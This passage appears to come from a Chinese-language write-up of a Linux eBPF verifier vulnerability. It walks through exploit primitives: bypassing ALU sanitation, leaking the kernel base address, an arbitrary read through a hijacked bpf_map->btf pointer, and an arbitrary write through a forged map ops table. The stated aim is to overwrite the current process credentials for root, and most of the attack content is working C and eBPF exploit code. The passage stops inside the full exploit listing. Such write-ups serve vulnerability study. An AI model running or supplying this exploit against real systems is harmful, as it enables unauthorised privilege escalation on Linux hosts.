ff00000000),s32_min_value=2,s32_max_value=2,u32_max_value=2) R7_w=invP(id=0,smax
_value=9223372032559808513,umax_value=18446744069414584321,var_off=(0x0; 0xfffff
fff00000001),s32_min_value=0,s32_max_value=1,u32_max_value=1) R8_w=map_value(id=
0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp
-8=mmmmmmmm
/* r6={s32_min_value=2,s32_max_value=2},var_off=(0x2; 0xffffffff00000000) */
37: (57) r6 &= 1
38: R0_w=invP0 R6_w=invP0 R7_w=invP(id=0,smax_value=9223372032559808513,umax_val
ue=18446744069414584321,var_off=(0x0; 0xffffffff00000001),s32_min_value=0,s32_ma
x_value=1,u32_max_value=1) R8_w=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_
ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r6=0,var_off=(0x0; 0xffffffff00000000) */

泄露内核基地址:

对于 BPF_MAP_TYPE_ARRAY 类型 的 map 而言,其 wrapper 为 bpf_array 类型(即 bpf_map 内嵌于该结构体中),数据则直接存放在其内部的 value 数组成员当中,因此在查找元素时我们获得的其实是一个指向 bpf_array 内部的指针

1
2
3
4
5
6
7
8
9
10
11
/*
 * Wrapper object of a BPF_MAP_TYPE_ARRAY map: the generic struct bpf_map is
 * embedded as the first member and the element storage follows the header,
 * so a pointer to an element points inside this object.
 */
struct bpf_array {
struct bpf_map map;
u32 elem_size;
u32 index_mask;
struct bpf_array_aux *aux;
/* element storage; which member is used depends on the map flavour */
union {
char value[0] __aligned(8);
void *ptrs[0] __aligned(8);
void __percpu *pptrs[0] __aligned(8);
};
};
  • 因此我们只需要前向读取便能读取到 bpf_map,之后可以通过 bpf_map 的函数表泄露内核地址

理论上我们可以构造寄存器,使 verifier 将负数识别为 “0”,但实际上我们还要突破 ALU Sanitation 的检查:

  • ALU Sanitation 是一个用于运行时动态检测的功能,通过对程序正在处理的实际值进行运行时检查以弥补 verifier 静态分析的不足
  • 核心原理就是在 eBPF 程序中每一条对指针做标量加减运算的 ALU 指令前面,都添加上额外的辅助指令,在运行时对偏移量进行掩码处理
1
2
3
4
5
6
7
8
9
10
11
/* Kernel excerpt: masking sequence emitted for ALU sanitation. */
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1); /* AX = alu_limit - 1 */
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg); /* AX -= off_reg */
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg); /* AX |= off_reg */
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0); /* AX = -AX */
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63); /* AX >>= 63 (arithmetic): all ones or zero */
if (issrc) {
/* offset is the source operand: keep the masked copy in AX and use AX instead */
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);
insn->src_reg = BPF_REG_AX;
} else {
/* offset is the destination operand: mask it in place */
*patch++ = BPF_ALU64_REG(BPF_AND, off_reg, BPF_REG_AX);
}
  • 其中 aux->alu_limit 为当前指针运算范围,初始时为 “0”,与指针所做的常量运算同步
  • 对于减法而言可读范围为 (ptr - alu_limit, ptr](这里保证了指针的偏移不会为负)

由于我们有运行时为 “1”,但 verifier 认为是 “0” 的寄存器,我们可以这样调整范围:

  • 构造另外一个同样是运行时值为 “1”,但 verifier 认为是 “0” 的寄存器 R8(可以选择直接将 R6 拷贝给 R8)
  • 令 R7 指向 map 第一个元素的第一个字节 value[0]
  • 将 R7 加上 0x1000:R7 = value[0x1000],alu_limit = 0x1000
  • 将 R8 乘上 0x1000:R8 = 0x1000
  • 执行 R7 -= R8,由于 verifier 认为 R8 为 “0”,因此 alu_limit 保持不变,但 R7 实际上已经指回了 value[0]
  • 执行 R7 -= 0x110:R7 = value[-0x110],alu_limit = 0x1000
1
2
3
4
5
6
7
8
9
10
11
12
/*
 * Instruction list that reads the 8 bytes located 0x110 bytes before
 * element 0 of the map and stores them into element 1.
 * Requires VULN_REG to be the "verifier thinks 0, runtime 1" register:
 * r7 is advanced by 0x1000 and pulled back by r8 = VULN_REG * 0x1000, then
 * moved a further VULN_REG * 0x110 backwards. Both subtractions look like
 * "minus 0" to the verifier.
 * Leaves VULN_REG multiplied by 0x110; clobbers r7 and r8.
 */
#define LEAK_MAP_OPS(__map_fd)                             \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

构造任意读 RAA:

现在我们能够读写 bpf_map 中的数据,我们需要注意其中的 btf 指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/*
 * Excerpt (elided with "......") of the generic map header embedded at the
 * start of struct bpf_array. The exploit overwrites ops, map_type,
 * max_entries, spin_lock_off and btf in this structure.
 */
struct bpf_map {
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type;
u32 key_size;
u32 value_size;
u32 max_entries;
u32 map_flags;
int spin_lock_off; /* >=0 valid offset, <0 error */
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf; /* pointer hijacked for the arbitrary read */
......
};

当函数 bpf_map_get_info_by_fd 被调用时,程序会把 bpf_map->btf->id 拷贝给用户空间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
 * Excerpt (elided with "......") of the handler that fills a
 * struct bpf_map_info for a map fd and copies it to user space.
 * Returns 0 on success or -EFAULT if the copy to user space fails.
 */
static int bpf_map_get_info_by_fd(struct file *file,
struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr)
{
struct bpf_map_info __user *uinfo = u64_to_user_ptr(attr->info.info);
struct bpf_map_info info;
u32 info_len = attr->info.info_len;
int err;

......

/* The id is read through map->btf, so a forged btf pointer yields an arbitrary 4-byte read */
if (map->btf) {
info.btf_id = btf_obj_id(map->btf);
info.btf_key_type_id = map->btf_key_type_id;
info.btf_value_type_id = map->btf_value_type_id;
}

......

if (copy_to_user(uinfo, &info, info_len) ||
put_user(info_len, &uattr->info.info_len))
return -EFAULT;

return 0;
}

劫持 bpf_map->btf 即可完成 RAA:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * Instruction list that overwrites the 8 bytes located 0xd0 bytes before
 * element 0 of the map (bpf_map->btf according to the article) with
 * (first qword of map element __idx) - 0x58.
 * Requires VULN_REG to be the "verifier thinks 0, runtime 1" register; the
 * same +0x1000 / -VULN_REG*0x1000 sequence as in LEAK_MAP_OPS moves r7
 * backwards behind the verifier's back.
 * Leaves VULN_REG multiplied by 0xd0; clobbers r1, r7 and r8.
 */
#define READ_ARBITRARY_ADDR(__map_fd, __idx)            \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map->btf(这里的 0x58 是 btf.id 的偏移)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
data = info.btf_id;
return data;
}

/*
 * Read 8 bytes from the kernel address addr using two 4-byte reads.
 *
 * Map element 1 receives addr (low half) and element 2 receives addr + 4
 * (high half); each half is then fetched with read_arbitrary_addr_4_bytes().
 * The high half is read first, matching the original call order.
 *
 * Returns the assembled 64-bit value. A failed 4-byte read contributes 0.
 * Failure to update the map goes through err_exit().
 */
size_t read_arbitrary_addr(int map_fd, size_t addr)
{
    /* Zero-initialised so no stale stack bytes are copied into the map value */
    size_t value[0x1000] = {0};
    size_t data;

    for (int key = 1; key <= 2; key++) {
        value[0] = addr + (size_t)(key - 1) * 4;
        if (bpf_map_update_elem(map_fd, &key, value, 0) < 0){
            err_exit("FAILED to load value into map!");
        }
    }

    data = read_arbitrary_addr_4_bytes(map_fd, 2);
    data <<= 32;
    data += read_arbitrary_addr_4_bytes(map_fd, 1);
    return data;
}

构造任意写 WAA:

核心思想就是将 bpf_map->ops 覆盖为 bpf_array.value 中的地址(可控地址),并在 bpf_array.value 上伪造一个 fake ops,将 ops->map_push_elem 替换为 array_map_get_next_key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
 * Kernel excerpt: compute the key that follows *key in an array map and store
 * it through next_key.
 * - key == NULL or index >= max_entries: writes 0, returns 0
 * - index == max_entries - 1: writes nothing, returns -ENOENT
 * - otherwise: writes index + 1, returns 0
 * The write goes through next_key with no further check in this function,
 * which is what the exploit reuses as a 4-byte write.
 */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
u32 index = key ? *(u32 *)key : U32_MAX;
u32 *next = (u32 *)next_key;

if (index >= array->map.max_entries) {
*next = 0;
return 0;
}

if (index == array->map.max_entries - 1)
return -ENOENT;

*next = index + 1;
return 0;
}
  • 当 key 所指的 index 小于 map.max_entries - 1 时,index + 1 会被写入到 next_key 当中
  • 如果正常调用 map_get_next_key:只能控制 key 但是 next_key 不能控制
  • 如果通过函数指针 ops->map_push_elem 进行调用:可以控制这两个参数

当我们更新 eBPF map 时,若 map 类型为 BPF_MAP_TYPE_QUEUE 或 BPF_MAP_TYPE_STACK,则函数 bpf_map->ops->map_push_elem 就会被调用,不过在函数 map_update_elem 中还有一个检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 * Excerpt (elided with "......") of the BPF_MAP_UPDATE_ELEM handler showing
 * the BPF_F_LOCK check discussed in the article.
 */
static int map_update_elem(union bpf_attr *attr)
{

......

/* BPF_F_LOCK is only accepted for maps whose value contains a spin lock */
if ((attr->flags & BPF_F_LOCK) &&
!map_value_has_spin_lock(map)) {
err = -EINVAL;
goto err_put;
}

......

return err;
}
1
2
3
4
/* True when the map records a non-negative spin_lock_off, i.e. its value holds a spin lock. */
static inline bool map_value_has_spin_lock(const struct bpf_map *map)
{
return map->spin_lock_off >= 0;
}
  • 若 flags 设置了 BPF_F_LOCK 标志位,则会检查 map->spin_lock_off 是否大于等于 0,因此这里我们还要将该字段改为一个正整数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/*
 * Instruction list that rewrites four fields of the map header located in
 * front of element 0, preparing the map for the arbitrary-write primitive.
 * Requires VULN_REG to be the "verifier thinks 0, runtime 1" register.
 *
 * r7 starts at element 0 and only ever moves backwards, so the subtractions
 * are cumulative: -0xE4, then -0xEC, then -0xF8, then -0x110 relative to
 * element 0. r8 keeps a pristine copy of VULN_REG, which is restored before
 * each multiplication.
 * Field names below follow the article (assumes its bpf_map layout with the
 * value array at offset 0x110 - TODO confirm for other kernel builds).
 * Clobbers r4, r5, r7, r8 and VULN_REG.
 */
#define MAKE_ARBITRARY_WRITE_OPS(__map_fd)                  \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
/* overwrite spin_lock_off */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map 中的各个条目:
    • spin_lock_off = 0x2000(绕过 map_update_elem 中的检查)
    • max_entries = 0xffffffff(为了满足 key < map.max_entries 的条件)
    • map_type = 23(BPF_MAP_TYPE_STACK)(为了使 bpf_map->ops->map_push_elem 能被调用)
    • ops = target_addr(设置写入的目标地址)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/*
 * Prepare the arbitrary-write primitive for map_fd.
 *
 * 1. Copy the genuine bpf_map_ops table out of the kernel (so the other
 *    callbacks keep working) and replace map_push_elem with
 *    array_map_get_next_key.
 * 2. Store that forged table in map element 1 and its kernel address
 *    (fake_ops_addr) in map element 2.
 * 3. Run the eBPF program that patches the map header to point ops at the
 *    forged table.
 *
 * Relies on the file-level map_addr, map_ops_addr and kernel_offset having
 * been leaked already; sets fake_ops_addr. Any failure goes through err_exit().
 */
void make_arbitrary_write_ops(int map_fd){
    struct bpf_insn prog[] = {
        TRIGGER_VULN(map_fd),
        MAKE_VULN_REG(map_fd),
        MAKE_ARBITRARY_WRITE_OPS(map_fd),
        BPF_EXIT_INSN()};
    /* Zero-initialised so no stale stack bytes are copied into the map value */
    size_t value[0x1000] = {0};
    size_t value_idx = 0;
    struct bpf_map_ops *ops_data;
    int key;

    /* Element 1 lives one value slot past element 0, which starts at map_addr + 0x110 */
    fake_ops_addr = map_addr + 0x110 + MAP_SIZE;

    /* Read the original bpf_map->ops table, 8 bytes at a time */
    for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
        value[value_idx++] = read_arbitrary_addr(map_fd, map_ops_addr + i);
    }

    /* Redirect map_push_elem to array_map_get_next_key */
    ops_data = (struct bpf_map_ops *)value;
    ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
    key = 1;
    if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
        err_exit("FAILED to store fake ops table into map!");
    }

    key = 2;
    value[0] = fake_ops_addr;
    if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
        err_exit("FAILED to store fake ops address into map!");
    }

    /* A negative result means the program was not loaded or run; later writes would silently do nothing */
    if (run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0) < 0){
        err_exit("FAILED to run the ops-overwrite eBPF program!");
    }
}

在获取以上所有组件之后,程序的入侵步骤如下:

  • 泄露 map_ops_addr 计算内核基地址
  • 泄露 map_addr
  • 利用 RAA 扫描内存,泄露 current_task 和 current_cred
  • 覆盖 bpf_map->ops->map_push_elem,为 WAA 做准备
  • 利用 WAA 覆盖 current_cred 并进行提权

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <net/if.h>
#include <linux/if_packet.h>

/* Print msg to stdout behind a bold red "[x] Run eBPF error: " tag, followed by a newline. */
static __always_inline void err_print(const char *msg)
{
    static const char tag[] = "\033[31m\033[1m[x] Run eBPF error: \033[0m";

    printf("%s%s\n", tag, msg);
}

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
((struct bpf_insn) { \
.code = CODE, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = IMM \
})

#define BPF_ALU64_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU32_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU64_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU32_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV64_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV32_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV64_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV32_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_K, DST, 0, 0, IMM)

/*
 * 64-bit immediate load. Expands to TWO comma-separated instructions, so it
 * occupies two slots of the instruction array: the first carries the low 32
 * bits of IMM, the second (opcode 0) carries the high 32 bits.
 */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_DW | BPF_IMM, DST, SRC, 0, (uint32_t) (IMM)),\
BPF_RAW_INSN(0, 0, 0, 0, ((uint64_t) (IMM)) >> 32)

/* 64-bit immediate load with src_reg = 0 (plain constant) */
#define BPF_LD_IMM64(DST, IMM) \
BPF_LD_IMM64_RAW(DST, 0, IMM)

/* Fallback for kernel headers that do not provide BPF_PSEUDO_MAP_FD */
#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif

/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

/*
 * Memory access instructions. SIZE is one of the BPF_B/BPF_H/BPF_W/BPF_DW
 * size codes; OFF is the signed offset added to the base register.
 */

/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */
#define BPF_LD_ABS(SIZE, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, 0, 0, 0, IMM)

/* dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

/* *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

/*
 * Atomic read-modify-write on *(dst_reg + off16); the operation code OP is
 * carried in the immediate field.
 * NOTE(review): BPF_ATOMIC must be provided by the installed <linux/bpf.h>;
 * older headers only define BPF_XADD -- confirm against the build host.
 */
#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, DST, SRC, OFF, OP)

/* Atomic add, expressed through BPF_ATOMIC_OP with OP = BPF_ADD */
#define BPF_STX_XADD(SIZE, DST, SRC, OFF) \
BPF_ATOMIC_OP(SIZE, BPF_ADD, DST, SRC, OFF)

/* *(uint *) (dst_reg + off16) = imm */
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM)

/*
 * Conditional jumps. OP is a BPF_J* condition code and OFF is the number of
 * instructions to skip when the condition holds. The plain variants use the
 * BPF_JMP class, the "32" variants the BPF_JMP32 class; "_REG" compares DST
 * against a register, "_IMM" against the immediate.
 */

/* BPF_JMP class, compare DST with register SRC */
#define BPF_JMP_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

/* BPF_JMP32 class, compare DST with register SRC */
#define BPF_JMP32_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

/* BPF_JMP class, compare DST with immediate IMM */
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

/* BPF_JMP32 class, compare DST with immediate IMM */
#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

/* Program exit instruction */
#define BPF_EXIT_INSN() \
BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

/*
 * Emit the instruction sequence that calls the map_lookup_elem helper on
 * __map_fd with key __idx and leaves the returned element pointer in
 * __dst_reg.
 *
 * The key is stored in the 8 stack bytes at r10 - 8. If the helper returns 0
 * the program exits on the spot (r0 is 0 at that point); otherwise r0 is
 * copied into __dst_reg and r0 is reset to 0.
 * Registers written by the sequence itself: r0, r1, r2, r9 and __dst_reg.
 * Expands to several comma-separated instructions.
 */
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#ifndef __user
#define __user
#endif

#ifndef __rcu
#define __rcu
#endif

struct bpf_map;
struct btf;
struct btf_type;
struct bpf_prog;
struct bpf_prog_aux;
struct poll_table_struct;
struct vm_area_struct;
struct bpf_local_storage_map;

/*
 * Userspace declaration of the kernel's per-map-type operations table.
 *
 * map is generic key/value storage optionally accessible by eBPF programs.
 *
 * NOTE(review): this is presumably copied from the kernel version the
 * write-up targets (5.11.x). Code in this file takes sizeof() of the struct
 * and addresses individual members, so the member order and count must match
 * the running kernel exactly -- do not reorder, add or remove members.
 * Several pointee types (struct file, struct seq_file, struct bpf_insn, ...)
 * are only named in parameter lists; they are never dereferenced here.
 */
struct bpf_map_ops {
/* funcs callable from userspace (via syscall) */
int (*map_alloc_check)(union bpf_attr *attr);
struct bpf_map *(*map_alloc)(union bpf_attr *attr);
void (*map_release)(struct bpf_map *map, struct file *map_file);
void (*map_free)(struct bpf_map *map);
int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
void (*map_release_uref)(struct bpf_map *map);
void *(*map_lookup_elem_sys_only)(struct bpf_map *map, void *key);
int (*map_lookup_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_lookup_and_delete_batch)(struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_update_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_delete_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);

/* funcs callable from userspace and from eBPF programs */
void *(*map_lookup_elem)(struct bpf_map *map, void *key);
int (*map_update_elem)(struct bpf_map *map, void *key, void *value,
uint64_t flags);
int (*map_delete_elem)(struct bpf_map *map, void *key);
int (*map_push_elem)(struct bpf_map *map, void *value, uint64_t flags);
int (*map_pop_elem)(struct bpf_map *map, void *value);
int (*map_peek_elem)(struct bpf_map *map, void *value);

/* funcs called by prog_array and perf_event_array map */
void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
int fd);
void (*map_fd_put_ptr)(void *ptr);
int (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
uint32_t (*map_fd_sys_lookup_elem)(void *ptr);
void (*map_seq_show_elem)(struct bpf_map *map, void *key,
struct seq_file *m);
int (*map_check_btf)(const struct bpf_map *map,
const struct btf *btf,
const struct btf_type *key_type,
const struct btf_type *value_type);

/* Prog poke tracking helpers. */
int (*map_poke_track)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_untrack)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_run)(struct bpf_map *map, uint32_t key,
struct bpf_prog *old, struct bpf_prog *new);

/* Direct value access helpers. */
int (*map_direct_value_addr)(const struct bpf_map *map,
uint64_t *imm, uint32_t off);
int (*map_direct_value_meta)(const struct bpf_map *map,
uint64_t imm, uint32_t *off);
int (*map_mmap)(struct bpf_map *map, struct vm_area_struct *vma);
__poll_t (*map_poll)(struct bpf_map *map, struct file *filp,
struct poll_table_struct *pts);

/* Functions called by bpf_local_storage maps */
int (*map_local_storage_charge)(struct bpf_local_storage_map *smap,
